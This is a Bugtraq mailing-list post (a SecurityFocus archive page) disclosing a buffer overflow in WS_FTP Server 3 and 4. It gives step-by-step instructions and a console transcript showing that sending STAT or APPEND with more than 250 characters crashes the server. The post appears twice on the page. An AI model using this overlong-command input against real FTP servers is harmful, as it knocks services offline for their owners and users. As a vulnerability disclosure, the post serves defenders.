Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Remote and Local Vulnerabilities In WS_FTP Server
Sep 06 2003 04:48AM
pejman d (pejman rite ca)
hi dear
i am pejman.d ,i finded the new bug in ws_ftp server
Vulnerable Systems : ws_ftp server 4,3
the bug is buffer overflow in ftp command service stop and some error
step by step buffer overflow :
1- login to ftp server by any username and password
2- use the quote command for send the command to server
3- you can use status or append or some command
4- after command 250 character for overflow : status 255x[A] or
append 255x[A]and other command
quote
Command line to send
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
SAMPLE :
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Connection closed by remote host.
ftp>
ftp server is stop and all connection is refused !!!
it's work at ver 3,4 and test on the windows 2000 advance and prof with
sp4
i u need the additional information send mail to pejman (at) rite (dot) ca [email concealed]
pejman.d (deject hacker )
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
hi dear
i am pejman.d ,i finded the new bug in ws_ftp server
Vulnerable Systems : ws_ftp server 4,3
the bug is buffer overflow in ftp command service stop and some error
step by step buffer overflow :
1- login to ftp server by any username and password
2- use the quote command for send the command to server
3- you can use status or append or some command
4- after command 250 character for overflow : status 255x[A] or
append 255x[A]and other command
quote
Command line to send
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
SAMPLE :
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Connection closed by remote host.
ftp>
ftp server is stop and all connection is refused !!!
it's work at ver 3,4 and test on the windows 2000 advance and prof with
sp4
i u need the additional information send mail to pejman (at) rite (dot) ca [email concealed]
pejman.d (deject hacker )
[ reply ]